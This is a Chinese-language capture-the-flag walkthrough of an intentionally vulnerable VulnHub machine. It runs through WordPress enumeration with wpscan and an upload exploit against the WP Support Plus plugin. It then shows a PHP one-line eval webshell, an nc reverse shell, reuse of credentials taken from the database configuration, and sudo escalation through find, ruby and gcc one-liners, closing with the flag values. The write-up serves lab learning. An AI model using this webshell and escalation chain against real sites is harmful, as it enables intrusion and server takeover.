需要原图的话,公众号后台回复数字:0423
无有用信息
无有用信息
发现有80端口和3306端口。
首页为apache的默认页面。
在此页面发了网站目录g@web
,访问该目录
在blog栏目找到该网站为wordpress。
使用wpscan对网站进行扫描,使用 -e u 枚举用户
wpscan --url 10.0.2.64/g@web -e u
我们发现了用户wp-local
t 和一个页面:http://10.0.2.64/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
访问该页面:
在页面中发现:hackNos@9012!!
,提示为可以用此密码得到shell
在使用-e ap
,查看wordpress的插件
wpscan --url 10.0.2.64/g@web -e ap
发现插件WP Support Plus Responsive Ticket System
和上传目录http://10.0.2.64/g@web/wp-content/uploads/
<form method="post" enctype="multipart/form-data" action=" <input type="hidden" name="action" value="wpsp_upload_attachment"> Choose a file ending with .phtml: <input type="file" name="0"> <input type="submit" value="Submit"> </form>
将代码进行适配并保存到本地,存为html
文件,本地启用http服务并加载该文件。
可以看到,是需要上传一个.phtml
的文件,我们将一句话木马写入文件
<?php @eval($_POST['cmd']);?>
将木马上传。
在上传文件夹下的wpsp文件夹中找到了上传的木马。
用蚁剑连接
在蚁剑中使用虚拟终端,就获得了webshell
在蚁剑中的虚拟终端中,使用nc反弹
本地监听,得到反弹shell
'DB_NAME', 'hackNos' 'DB_USER', 'wp' 'DB_PASSWORD', 'g@web-password'
cat /etc/passwd|grep /bin/bash
hunter:x:1000:1000:hunter,,,:/home/hunter:/bin/bash security:x:1001:1001:Security,,,,Audit:/home/security:/bin/bash hackNos-boat:x:1002:1002:crawler,,,,web directory crawler:/home/hackNos-boat:/bin/bash
在 /home/hunter/下发现user.txt文件。
使用之前的hackNos@9012!!
和数据库密码g@web-password
尝试登录三个系统账号,最终发现security
的密码为hackNos@9012!!
我们已经提权到security
使用sudo -l
查看特权
发现可以用hackNos-boast
账户使用find
命令,使用find进行提权 使用gtfo查找提权命令,网址为:https://gtfobins.github.io/
执行命令:
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash ; -quit
已经提权到hackNos-boast
账号
使用sudo -l
查看特权
发现可以用hunter
账户使用ruby
命令,使用ruby进行提权 使用gtfo查找提权命令。
执行命令:
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
提权到hunter
账号
访问前面发现的user.txt文件
得到第一个flag4676cd2e30b6d0b8650d14a5dd9f16c3
使用sudo -l
查看特权
发现可以用root
执行gcc
命令,使用gcc提权
用gtfo查找提权命令
sudo /usr/bin/gcc -wrapper /bin/bash,-s .
访问root.txt
bae11ce4f67af91fa58576c1da2aad4b
原创投稿作者:Crazy
靶机下载地址:https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/135159.html